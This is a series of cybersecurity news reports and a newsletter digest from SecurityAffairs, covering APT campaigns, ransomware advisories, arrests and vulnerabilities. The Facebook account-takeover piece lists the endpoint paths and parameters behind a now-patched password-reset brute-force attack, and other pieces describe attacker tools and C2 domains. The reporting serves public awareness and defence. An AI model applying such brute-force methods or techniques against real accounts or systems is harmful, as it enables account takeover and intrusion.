The PDF document was uploaded to VirusTotal from Latvia on January 30, 2024. The evidence collected by Zscaler suggests that this campaign has been active since at least July 6, 2023.

The threat actor used compromised websites for hosting intermediate payloads or to act as C2 servers. To avoid detection the C2 server only responds to specific types of requests at certain times.

“The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions.” concludes the report. “While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats.“

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, SPIKEDWINE)

A critical vulnerability in Facebook could have allowed threat actors to hijack any Facebook account, researcher warns.

Meta addressed a critical Facebook vulnerability that could have allowed attackers to take control of any account.

The Nepalese researcher Samip Aryal described the flaw as a rate-limiting issue in a specific endpoint of Facebook’s password reset flow. An attacker could have exploited the flaw to takeover any Facebook account by brute-forcing a particular type of nonce.

Meta awarded the researchers for reporting the security issue as part of Facebook’s bug bounty program.

The researchers discovered that the issue impacts Facebook’s password reset procedure when the user selects “Send Code via Facebook Notification.”

Analyzing the vulnerable endpoint the researcher discovered that three conditions opened the door for a brute-force attack:

1. The nonce sent to the user is active for longer than I expected (≈ 2 hrs)
2. The same nonce code was sent every time for the period.
3. I didn’t see any sort of code invalidation after entering the correct code but with multiple previous invalid tries (unlike in the SMS reset functionality).

Choosing the option “Send Code via Facebook Notification” will send a POST request to:

POST /ajax/recover/initiate/ HTTP/1.1

with the parameter; recover_method=send_push_to_session_login

Then the researchers attempted to send a 6-digit code ‘000000’ to analyze the POST request sent to the vulnerable endpoint:

POST /recover/code/rm=send_push_to_session_login&spc=0&fl=default_recover&wsr=0 HTTP/1.1

where “n” parameter holds the nonce.

At this stage, bruteforcing this 6-digit value had become a trivial task for the expert.

“there was no rate limiting on this endpoint, thus the matching code was responded back with a 302 status code. Use this code to log in/reset the FB account password for the user account.” reads the analysis published by Aryal.

The researcher noticed that upon exploiting this vulnerability, Facebook would notify the targeted user. The notification would either display the six-digit code directly or prompt the user to tap the notification to reveal the code.

The researcher reported the flaw to Meta on January 30, 2024, and the company addressed the issue on February 2nd, 2024. This vulnerability had a huge impact, Meta recognized it as a zero-click account takeover exploit. Aryal is currently ranked in first place in Facebook’s Hall of Fame 2024.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Meta)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft Streaming Service vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2023-29360 (CVSS Score 8.4) Microsoft Streaming Service Untrusted pointer dereference vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

An attacker can exploit this vulnerability to gain SYSTEM privileges. The vulnerability was discovered by Thomas Imbert (@masthoon) from Synacktiv (@Synacktiv) through the Trend Micro Zero Day Initiative.

The availability of proof-of-concept (PoC) codes allowed multiple threat actors to include the malicious code in their attack chain.

Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driverhttps://t.co/C7wvIQk7HL

— Nicolas Krassas (@Dinosn) September 26, 2023

In February, the analysis of some Raspberry Robin samples before October 2023, revealed that the operators also used an exploit for CVE-2023-29360. The exploit for the vulnerability CVE-2023-29360 was publicly disclosed in June, and Raspberry Robin employed it in August.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by March 21, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

Crooks stole €15.5 million from the European variety retail and discount company Pepco through a phishing attack.

The Hungarian business of the European discount retailer Pepco Group has been the victim of a phishing attack, crooks stole about 15 million euros ($16.3 million). The group operates three distribution lines: Poundland in the United Kingdom, Dealz in the Republic of Ireland and Spain, and Pepco in various European countries.

“Pepco Group (“Pepco” or the “Group”) has been the target of a sophisticated fraudulent phishing attack in its Hungarian business.” reads the press release published by the company. “The attack has resulted in a loss of approximately €15.5 million in cash, before any potential recovery. It is unclear at this stage whether the funds can be recovered, although Pepco is pursuing various efforts through its banking partners and the police. At this stage, the incident does not appear to have involved any customer, supplier or colleague information or data.”

Pepco launched an investigation into the incident with the help of law enforcement. The discount retailer is working with banks in an attempt to locate and freeze the stolen funds, however, it’s still currently unclear whether the funds can be recovered.

The company pointed out that the cyber attack doesn’t involve any customer, supplier or staff information or data.

The Group attempted to reassure its customers and business partners stating it possesses a robust balance sheet, currently having access to over €400 million in liquidity from cash and credit facilities.

“The Group maintains a strong balance sheet with access today to over €400 million in available liquidity (from cash and credit facilities) and continues to generate strong cash flow from its operations. The Group takes financial controls and IT security extremely seriously and is currently conducting a group-wide review of all systems and processes to secure the business more robustly going forward.” continues the press release.

The press release doesn’t provide technical details about the attack, however it was likely victim of a Business Email Compromise (BEC) attack.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Pepco)

The Five Eyes alliance warns of threat actors exploiting known security flaws in Ivanti Connect Secure and Ivanti Policy Secure gateways.

The Five Eyes intelligence alliance issued a joint cybersecurity advisory warning of threat actors exploiting known vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways.

The advisory provides details about the exploitation in the wild of Connect Secure and Policy Secure vulnerabilities CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. Multiple threat actors are chaining these issues to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.

The CISA’s advisory also warns that the Ivanti Integrity Checker Tool is not sufficient to detect a compromise. Government experts also reported that the exploitation of the flaw can allow threat actors to maintain root-level persistence.

“The advisory describes cyber threat actor exploitation of multiple previously identified Connect Secure and Policy Secure vulnerabilities—namely CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—which threat actors can exploit in a chain to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.” reads the advisory. “Additionally, the advisory describes two key CISA findings:  

1. The Ivanti Integrity Checker Tool is not sufficient to detect compromise due to the ability of threat actors to deceive it, and  
2. A cyber threat actor may be able to gain root-level persistence despite the victim having issued factory resets on the Ivanti device.” 

The advisory includes mitigations and indicators of compromise (IOCs).

Below are the descriptions of the vulnerabilities included in the advisory:

• The flaw CVE-2023-46805 (CVSS score 8.2) is an Authentication Bypass issue that resides in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure. A remote attacker can trigger the vulnerability to access restricted resources by bypassing control checks.
• The second vulnerability, tracked as CVE-2024-21887 (CVSS score 9.1) is a command injection issue in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure. An authenticated administrator can exploit the issue by sending specially crafted requests and execute arbitrary commands on the appliance. An attacker can chain this flaw with the vulnerability CVE-2023-46805 to send specially crafted requests to unpatched systems and execute arbitrary commands. 
• The vulnerability CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Connect Secure (9.x, 22.x), Policy Secure (9.x, 22.x) and Neurons for ZTA. An authenticated attacker can exploit the issue to access certain restricted resources.

The software firm also addressed the following two additional high-severity vulnerabilities:

• CVE-2024-21888 (CVSS score: 8.8) – Privilege escalation vulnerability in web component
• CVE-2024-22024 (CVSS score: 8.3) – XXE vulnerability in the SAML component

“The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.” continues the advisory. “If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.”

In response to the joint advisory and its findings, Ivanti published an update stating that technical findings observed in CISA’s lab have not been observed in real-world scenarios or considered viable in live customer environments. CISA and other government agencies suggest that defenders utilize Ivanti’s recently released external Integrity Checker Tool (ICT), made available on 27th February.

“As part of our exhaustive investigation into the recent attack against our customers, Ivanti and Mandiant released findings today regarding evolving threat actor tactics, techniques and procedures (TTPs). These findings were identified in the ongoing analysis of the previously disclosed vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, and include potential persistence techniques that we are monitoring, even though to date they have not been deployed successfully in the wild.” said the software firm.

“Importantly, this is not a new CVE, and we and our security and government partners are not aware of any instances of successful threat actor persistence following implementation of security updates and factory resets.“

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

German police seized the largest German-speaking cybercrime marketplace Crimemarket and arrested one of its operators.

The Düsseldorf Police announced that a large-scale international law enforcement operation led to the seizure of the largest German-speaking cybercrime marketplace.

“Under the direction of the North Rhine-Westphalia Cybercrime Central and Contact Office (ZAC NRW), an investigative commission at the Düsseldorf Police Headquarters has been collecting evidence for years about crimes relating to the criminal platform “Crimemarket”.” reads the press release published by the German police. “Based on the usual structure of legal digital marketplaces, narcotics, criminal services, but also detailed instructions on serious crimes were sold in various categories. In addition to the operators, the investigations are directed against both the providers operating through this marketplace and against users.”

The investigation lasted several years during which the police performed numerous searches. The authorities arrested six individuals, including an alleged operator of the marketplace. The police seized numerous pieces of electronic equipment, including cell phones, IT devices and data carriers. In 21 cases, officers in North Rhine-Westphalia seized narcotics, including 1 kilogram of marijuana and various ecstasy tablets. The authorities also seized almost 600,000 euros in cash and movable assets.

Crimemarket was a prominent platform for trading illegal drugs, narcotics, and cybercrime services. Operators were also offering tutorials for several criminal activities.

During the seizure, the marketplace had more than 180,000 registered users. The platform was accessible through both the “Darknet” and the “Clearnet.

“On Thursday, February 29, 2024, a total of 102 search warrants were executed nationwide at the same time in the evening. The local focus of the measures was primarily in North Rhine-Westphalia with 36 search objects. A total of three people were arrested here, including the 23-year-old main suspect at his home address in the Rhine district of Neuss (Korschenbroich).” reads the press release published by the Düsseldorf Police. “A total of three more people were arrested in police measures in other federal states, which were initiated by the police there.”

The investigation is still ongoing, the police plan to identify and target the users of the platform. 

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Crimemarket)

US CISA, the FBI, and MS-ISAC issued a joint CSA to warn of attacks involving Phobos ransomware variants observed as recently as February 2024

US CISA, the FBI, and MS-ISAC issued a joint cyber security advisory (CSA) to warn of attacks involving Phobos ransomware variants such as Backmydata, Devos, Eight, Elking, and Faust.

The attacks were observed as recently as February 2024, they targeted government, education, emergency services, healthcare, and other critical infrastructure sectors.

Phobos operation uses a ransomware-as-a-service (RaaS) model, it has been active since May 2019.

Based on information from open sources, government experts linked multiple Phobos ransomware variants to Phobos intrusions due to observed similarities in Tactics, Techniques, and Procedures (TTPs). Phobos intrusions also involved the use of various open-source tools, including Smokeloader, Cobalt Strike, and Bloodhound. These tools are widely available and user-friendly across different operating environments, contributing to the popularity of Phobos and its associated variants among various threat actors.

Threat actors behind Phobos attacks were observed gaining initial access to vulnerable networks by leveraging phishing campaigns. They dropped hidden payloads or used internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports or by leveraging RDP on Microsoft Windows environments.

“Once they discover an exposed RDP service, the actors use open source brute force tools to gain access. If Phobos actors gain successful RDP authentication in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network.” reads the joint CSA. “Alternatively, threat actors send spoofed email attachments that are embedded with hidden payloads such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader’s hidden payload is downloaded onto the victim’s system, threat actors use the malware’s functionality to download the Phobos payload and exfiltrate data from the compromised system.“

Phobos actors were observed executing files such as 1saas.exe or cmd.exe to install additional Phobos payloads with elevated privileges enabled.

Threat actors behind Phobos ransomware attacks were also observed bypassing organizational network defense protocols by modifying system firewall configurations and evading detection by using Universal Virus Sniffer, Process Hacker, and PowerTool tools.

Phobos maintained persistence within compromised environments using Windows Startup folders and Run Registry Keys.

Threat actors used open-source tools such as Bloodhound, Sharphound, Mimikatz, NirSoft, and Remote Desktop Passview to enumerate the active directory and gather credentials. Phobos operators used WinSCP and Mega.io for data exfiltration to FTP servers or cloud storage.

Phobos is also able to identify and delete data backups.

Most of extortion takes place through email; nevertheless, certain affiliate groups have employed voice calls to reach out to victims. For communication purposes, Phobos actors employ diverse instant messaging applications such as ICQ, Jabber, and QQ.

The joint advisory contains indicators of compromise (IoCs) and mitigations for this threat.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Phobos ransomware)

The U.S. DoJ charged Iranian national Alireza Shafie Nasab for his role in attacks targeting U.S. government and defense entities.

The U.S. Department of Justice (DoJ) charged Iranian national Alireza Shafie Nasab (39) for multi-year hacking campaign targeting U.S. defense contractors and private companies.

Targeted entities include the U.S. Departments of the Treasury and State, defense contractors, and more than a dozen US companies, including firms based in New York.

According to DoJ, from at least in or about 2016 through or about April 2021, Nasab and other co-conspirators carried out a coordinated multi-year campaign to breach computers worldwide.

“While purporting to work as a cybersecurity specialist for Iran-based clients, Mr. Nasab allegedly participated in a persistent campaign to compromise U.S. private sector and government computer systems,” said Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division. “Today’s charges highlight Iran’s corrupt cyber ecosystem, in which criminals are given free rein to target computer systems abroad and threaten U.S. sensitive information and critical infrastructure. Our National Security Cyber Section remains focused on disputing these cross-border hacking schemes and holding those responsible to account.”

Nasab and other conspirators used spear phishing and other hacking techniques to infect more than 200,000 victim devices.

In one case, the hackers successfully compromised an administrator email account associated with a defense contractor. Then perpetrators used this administrator account to create unauthorized accounts under the Defense Contractor and used them to conduct spear-phishing campaigns targeting employees of another defense contractor and a consulting firm.

While conducting these attacks, the Iranian man worked for Mahak Rayan Afraz, a company based in Iran that claimed to offer cybersecurity services but was, in reality, a cover for the operations of the conspirators. Nasab was also involved in the acquisition of the infrastructure utilized in the long-running campaign. Nasab utilized the stolen identity of an actual individual to register a server and email accounts used in the attacks.

“In addition to spearphishing, the conspirators utilized social engineering, which involved impersonating others, generally women, in order to obtain the confidence of victims. These social engineering contacts were another means the conspiracy used to deploy malware onto victim computers and compromise those devices and accounts.” continues the DoJ.

The Iranian hacker faces up to 20 years in prison, plus a mandatory two-year sentence for identity theft.

Nasab faces charges, including conspiracy to commit computer fraud, with a maximum penalty of five years in prison; conspiracy to commit wire fraud, carrying a maximum penalty of 20 years; wire fraud, with a maximum penalty of 20 years; and aggravated identity theft, which mandates a consecutive term of two years in prison.

“Concurrent with the unsealing of the indictment, the U.S. Department of State’s Rewards for Justice Program is offering a reward of up to $10 million for information leading to the identification or location of Nasab.” concludes DoJ.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Iranian national)

A U.S. Court ordered surveillance firm NSO Group to hand over the source code for its Pegasus spyware and other products to Meta.

Meta won the litigation against the Israeli spyware vendor NSO Group, a U.S. Judge ordered the surveillance firm to hand over the source code for its Pegasus spyware and other products to the social network giant.

NSO Group has been requested to provide details regarding the complete functionality of the pertinent spyware, covering the period one year before the alleged attack through one year after the alleged attack (i.e., from April 29, 2018, to May 10, 2020).

In October 2019, WhatsApp sued the Israeli surveillance firm NSO Group accusing it of carrying out malicious attacks against its users.

The legal action alleges that the Israeli surveillance firm tried to compromise approximately 1,400 individuals through WhatsApp hacking attempts.

In May 2019, Facebook patched a critical zero-day vulnerability in WhatsApp, tracked as CVE-2019-3568, that has been exploited to remotely install spyware on phones by calling the targeted device.

At the time, The Financial Times reported that the WhatsApp zero-day was exploited by threat actors to deliver the spyware developed by surveillance firm NSO Group.

The surveillance software developed by NSO Group was used by government organizations worldwide to spy on human rights groups, activists, journalists, lawyers, and dissidents. Security experts have detected and analyzed some of the tools in its arsenal, such as the popular Pegasus spyware (for iOS) and Chrysaor (for Android). 

“The recent court ruling is an important milestone in our long-running goal of protecting WhatsApp users against unlawful attacks. Spyware companies and other malicious actors need to understand they can be caught and will not be able to ignore the law,” a WhatsApp spokesperson told The Guardian.

The Judge, however, decided that NSO Group would not be forced to reveal the names of its clients or information about its server architecture.

“While the court’s decision is a positive development, it is disappointing that NSO Group will be allowed to continue keeping the identity of its clients, who are responsible for this unlawful targeting, secret,” said Donncha Ó Cearbhaill, head of the Security Lab at Amnesty International.

In September 2018, a report published by Citizen Lab revealed that the NSO Pegasus spyware was used against targets across 45 countries worldwide.

In November 2019, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

In October 2019, NSO Group ‘s surveillance spyware made the headlines again, this time the malware was used to spy on 2 rights activists in Morocco according to Amnesty International.

In September 2018, a report published by Citizen Lab revealed that the NSO Pegasus spyware was used against targets across 45 countries worldwide.

In November 2019, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

In October 2019, NSO Group‘s surveillance spyware made the headlines again, this time the malware was used to spy on 2 rights activists in Morocco according to Amnesty International.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, NSO GROUP)

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

U.S. authorities charged an Iranian national for long-running hacking campaign

US cyber and law enforcement agencies warn of Phobos ransomware attacks

Five Eyes alliance warns of attacks exploiting known Ivanti Gateway flaws

Crooks stole €15 Million from European retail company Pepco

CISA adds Microsoft Streaming Service bug to its Known Exploited Vulnerabilities catalog

Researchers found a zero-click Facebook account takeover

Police seized Crimemarket, the largest German-speaking cybercrime marketplace

New SPIKEDWINE APT group is targeting officials in Europe

Is the LockBit gang resuming its operation?

Lazarus APT exploited zero-day in Windows driver to gain kernel privileges

Pharmaceutical giant Cencora discloses a data breach

Unmasking 2024’s Email Security Landscape

FBI, CISA, HHS warn of targeted ALPHV/Blackcat ransomware attacks against the healthcare sector

Russia-linked APT28 compromised Ubiquiti EdgeRouters to facilitate cyber operations

Black Basta and Bl00dy ransomware gangs exploit recent ConnectWise ScreenConnect bugs

XSS flaw in LiteSpeed Cache plugin exposes millions of WordPress sites at risk

IDAT Loader used to infect a Ukraine entity in Finland with Remcos RAT

US pharmacy outage caused by Blackcat ransomware attack on Optum Solutions

Zyxel fixed four bugs in firewalls and access points

Russia-linked APT29 switched to targeting cloud services

A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit

Hacking firm I-Soon data leak revealed Chinese gov hacking capabilities

IntelBroker claimed the hack of the Los Angeles International Airport

LockBit is back and threatens to target more government organizations

A cyber attack hit the Royal Canadian Mounted Police

Crooks stole $10 million from Axie Infinity co-founder

Cybercrime

Axie Infinity co-founder loses $9.7M in 3,248-ETH wallet hack  

Thyssenkrupp confirms cyber attack on automotive division 

“Pantsless Data”: Decoding Chinese Cybercrime TTPs  

US pharmacy outage triggered by ‘Blackcat’ ransomware at UnitedHealth unit, sources say 

Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities  

Hackers Steal Personal Information From Pharma Giant Cencora

Ransomware Groups Are Bouncing Back Faster From Law Enforcement Busts  

The Chainalysis 2024 Crypto Crime Report

Strike against the largest illegal German-speaking trading platform on the Internet – information on the status of the investigation and the measures taken  

Retailer Pepco loses about 15 mln euros in Hungarian phishing attack   

BlackCat Ransomware Affiliate TTPs 

Malware

Unveiling UAC-0184: The Steganography Saga of the IDAT Loader Delivering Remcos RAT to a Ukraine Entity in Finland  

#StopRansomware: ALPHV Blackcat  

European diplomats targeted by SPIKEDWINE with WINELOADER  

#StopRansomware: Phobos Ransomware   

The Art of Domain Deception: Bifrost’s New Tactic to Deceive Users 

Hacking

RCMP networks targeted by cyberattack

Hackers Leak 2.5M Private Plane Owners’ Data Linked to LA Intl. Airport Breach 

UAC-0149: Targeted selective attacks against the Defense Forces of Ukraine using COOKBOX (CERT-UA#9204)

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day  

0-Click Account Takeover on Facebook  

CISA and Partners Release Advisory on Threat Actors Exploiting Ivanti Connect Secure and Policy Secure Gateways Vulnerabilities  

Iranian National Charged for Multi-Year Hacking Campaign Targeting U.S. Defense Contractors and Private Sector Companies  

Intelligence and Information Warfare 

Biden to sign executive order on US port cybersecurity targeting Chinese-manufactured shipping cranes     

SVR Cyber Actors Adapt Tactics for Initial Cloud Access

Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations

Unmasking I-Soon | The Leak That Revealed China’s Cyber Operations  

European diplomats targeted by SPIKEDWINE with WINELOADER  

Cybersecurity          

What role artificial intelligence could play in evaluating the compliance of military operations with international humanitarian law: The case study of the conduct of hostilities in Ukraine

XSS Vulnerability in LiteSpeed Cache Plugin Affecting 4+ Million Sites

NIST updates Cybersecurity Framework after a decade of lessons 

Meta targeted in privacy complaints by EU consumer groups 

Best Practices for Cyber Crisis Management  

The CISO: 2024’s Most Important C-Suite Officer

President Biden Blocks Mass Transfer of Personal Data to High-Risk Nations 

Enhanced External Integrity Checking Tool to Provide Additional Visibility and Protection for Customers Against Evolving Threat Actor Techniques in Relation to Previously Disclosed Vulnerabilities  

Cyber Security Brief 24-03 – February 2024  

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Camera doorbells manufactured by the Chinese company Eken Group Ltd under the brands EKEN and Tuck are affected by major vulnerabilities.

Researchers from Consumer Reports (CR) discovered severe vulnerabilities in doorbell cameras manufactured by the Chinese company Eken Group Ltd. The company produces video doorbells under the brand names EKEN and Tuck, its products are by major retailers, including Amazon, Walmart, Shein, Sears and Temu.

The security flaws could allow threat actors to view footage from the devices or control them completely.

An attacker can exploit the flaws to create an account on the app and gain access to a nearby doorbell camera by pairing it with another device. Then threat actors can view footage and lock out the owner of the device.

Steve Blair, a CR privacy and security test engineer, and fellow test engineer David Della Rocca, discovered that at least 10 more seemingly identical video doorbells been sold under different brand names, are all controlled through the same mobile app, called Aiwit, which is owned by Eken.

“Thousands of these video doorbells are sold each month on Amazon and other online marketplaces, including Walmart, Sears, and the globally popular marketplaces Shein and Temu. Experts say they’re just a drop in the flood of cheap, insecure electronics from Chinese manufacturers being sold in the U.S.” reads the report published by CR.

The researchers purchased two doorbell cameras, sold under the Fishbot and Rakeblue brands, and discovered that both devices are affected by the same vulnerabilities.

The owners of these doorbell cameras facing threats from stalkers or estranged abusive partners and may be subjected to surveillance through their phones, online platforms, and interconnected smartphones.

Some of the doorbells analyzed by the researchers also lack a visible ID issued by the Federal Communications Commission (FCC), which is a mandatory requirement for the sale of these products in the U.S.

Some online marketplaces, such as Walmart, have removed the flawed products from their catalog and are offering refunds to their customers who purchased the devices.

At the time of this writing, the EKEN Smart Video Doorbell Camera Wireless devices are still available on Amazon.

“Big e-commerce platforms like Amazon need to take more responsibility for the harms generated by the products they sell,” says Justin Brookman, director of technology policy for CR. “There is more they could be doing to vet sellers and respond to complaints. Instead, it seems like they’re coasting on their reputation and saddling unknowing consumers with broken products.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, camera doorbells)

A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware.

Palo Alto Networks Unit 42 researchers discovered a new Linux variant of Bifrost (aka Bifrose) RAT that uses a deceptive domain (download.vmfare[.]com) that mimics the legitimate VMware domain.

The Bifrost RAT has been active since 2004, it allows its operators to gather sensitive information, including hostname and IP address. BIFROSE has data stealing capability, but it is mostly popular for its keylogging routines. The researchers also observed a spike in Bifrost’s Linux variants during the past few months.

The RAT is typically distributed through email attachments or malicious websites.

“The latest version of Bifrost reaches out to a command and control (C2) domain with a deceptive name, download.vmfare[.]com, which appears similar to a legitimate VMware domain.” reads the analysis published by Unit 42. “This is a practice known as typosquatting. By leveraging this deceptive domain, the threat actors behind Bifrost aim to bypass security measures, evade detection, and ultimately compromise targeted systems.”

The sample binary analyzed by the experts is compiled for x86, the authors removed debugging information and symbol tables to hinder analysis.

The recent sample of Linux variants of BIFROSE employes RC4 encryption to encrypt the collected victim data.

The researchers observed the malware trying to contact a Taiwan-based public DNS resolver with the IP address 168.95.1[.]1.

The researchers observed the malware initiating a DNS query to resolve the domain download.vmfare[.]com by using the public DNS resolver at 168.95[.]1.1. This technique is used to ensure that the malware can successfully connect to its intended destination.

The spike in Bifrost activity observed by Palo Alto Networks started in October 2023, the cybersecurity firm detected more than 100 instances (hashes) of malware samples.

The experts also discovered an Arm version of the Bifrose malware, a circumstance that led the researchers into believing that the authors are expanding their operations.

“The Bifrost RAT remains a significant and evolving threat to individuals and organizations alike. With new variants that employ deceptive domain strategies like typosquatting, a recent spike in Bifrost activity highlights the dangerous nature of this malware.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Bifrost)

Threat actors stole sensitive and confidential data from the telecom giant Chunghwa Telecom Company, revealed the Ministry of National Defense.

Chunghwa Telecom Company, Ltd. (literally Chinese Telecom Company) is the largest integrated telecom service provider in Taiwan, and the incumbent local exchange carrier of PSTN, Mobile, and broadband services in the country.

Threat actors stole sensitive information from the company, including military and government documents, revealed Taiwan’s Defense Ministry. Threat actors claim they have stolen 1.7 TeraBytes of data” that included government contracts.

Leaked data, including a contract between the Navy and Chunghwa Telecom, are available for sale on a dark web hacking forum, Broadcaster TVBS first reported.

“The initial analysis of this case is that hackers obtained Chunghwa Telecom’s sensitive information and sold it on the dark web, including documents from the army, Ministry of Foreign Affairs, Coast Guard Administration and other units,” the Defense Ministry said. “We have asked the contractor involved to strengthen its information security control to prevent any further incidents.”

Taiwan’s Defence Ministry pointed out that the leaked data, including contracts, did not contain confidential information.

“Currently, there is no significant impact on the Company’s operations,” reads a statement published by the company.

“Government officials have said that persistent cyber threats are a form of “grey zone harassment” engaged in by China on a near-daily basis, including flying warplanes around the island and sending vessels to its surrounding waters.” reported AFP agency.

Taiwan was a top target of cyber attacks ahead of the national elections. Cybersecurity experts attribute the vast majority of these attacks to China-linked threat actors. The country continues to be the target of an impressive number of cyber espionage campaigns.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Chunghwa Telecom)

Researcher HaxRob discovered a previously undetected Linux backdoor named GTPDOOR, designed to target telecom carrier networks.

Security researcher HaxRob discovered a previously undetected Linux backdoor dubbed GTPDOOR, which is specifically crafted to carry out stealth cyber operations within mobile carrier networks.

I recently found two very interesting Linux binaries uploaded to Virustotal.

I call this malware 'GTPDOOR'.

GTPDOOR is a 'magic/wakeup' packet backdoor that uses a novel C2 transport protocol: GTP (GPRS Tunnelling Protocol), silently listening on the GRX network (1/n) pic.twitter.com/IwuEcL14lx

— HaxRob (@haxrob) February 28, 2024

The researcher believes that the threat actors behind GTPDOOR focuses on systems proximate to the GPRS Roaming eXchange (GRX), such as SGSN, GGSN, and P-GW. The threat actors are focusing on components because they can give an intruder a direct access to a core network of the target telecom carrier.

A GPRS roaming exchange (GRX) acts as a hub for General Packet Radio Service (GPRS) connections from roaming users, removing the need for a dedicated link between each GPRS service provider. It was developed to facilitate a more efficient way for operators to interconnect networks, and played a large part in the transition to third-generation systems.

HaxRob attributes the GTPDOOR backdoor to the China-linked APT group Light Basin threat group (aka UNC1945).

LightBasin targeted and compromised mobile telephone networks around the globe and used specialized tools to access calling records and text messages from telecommunications companies.

The cyberespionage group has been active since at least 2016, according to the CrowdStrike researchers it is using a very sophisticated toolset. CrowdStrike researchers reported that at least 13 telecommunication companies were compromised by since 2019.

In October 2021, CrowdStrike uncovered a campaign after the investigation of a series of security incidents in multiple countries. The cybersecurity firm added that the threat actors show an in-depth knowledge of telecommunication network architectures.

CrowdStrike article observed the threat actor using the GPRS Tunnelling Protocol (GTP) for encapsulating tinyshell traffic in a valid PDP context session. The APT group employed an SGSN emulator to tunnel traffic to an external GGSN in another operator’s network.

HaxRob reported that the GTPDOOR backdoor uses the GPRS Tunnelling Protocol (GTP) for C2 communications.

Here, GTPDOOR is leveraging not off a PDP context (GTP-U, userplane) but specific GTP-C signalling messages with it’s own extended message structure.

“GTPDOOR is the name of Linux based malware that is intended to be deployed on systems in telco networks adjacent to the GRX (GRPS eXchange Network) with the novel feature of communicating C2 traffic over GTP-C (GPRS Tunnelling Protocol – Control Plane) signalling messages. This allows the C2 traffic to blend in with normal traffic and to reuse already permitted ports that maybe open and exposed to the GRX network.” reads the analysis. “The following diagram illustrates a forseen use of GTPDOOR. Here the actor already has established persistence on the roaming exchange network and access a compromised host by sending GTP-C Echo Request messages with a malicious payload:”

GTPDOOR allows threat actor with established persistence on the roaming exchange network to communicate with a compromised host by transmitting GTP-C Echo Request messages containing a malicious payload.

The researcher discovered two versions of the backdoor uploaded to VirusTotal in late 2023, respectively from Italy and China. It is interesting to highlight that both versions had a very low detection rate (respectively 1/63 and 0/63) at the time of the uploading on VirusTotal.

As they binaries were not stripped, they contain some artifacts that give us an idea of the intended platforms they were to be run on – Very outdated Red Hat Linux machines.

Someone hasn't been keeping their systems up to date ..

(3/n)) pic.twitter.com/hAKRJR1KFp

— HaxRob (@haxrob) February 28, 2024

Both binaries targeted a very old Red Hat Linux version.

GTPDOOR actively listens for a distinctive “magic” wakeup packet, a GTP-C echo request message (GTP type 0x01). The researcher pointed out that it doesn’t require active listening sockets or services, all UDP packets seamlessly find their way into the user space through a raw socket.

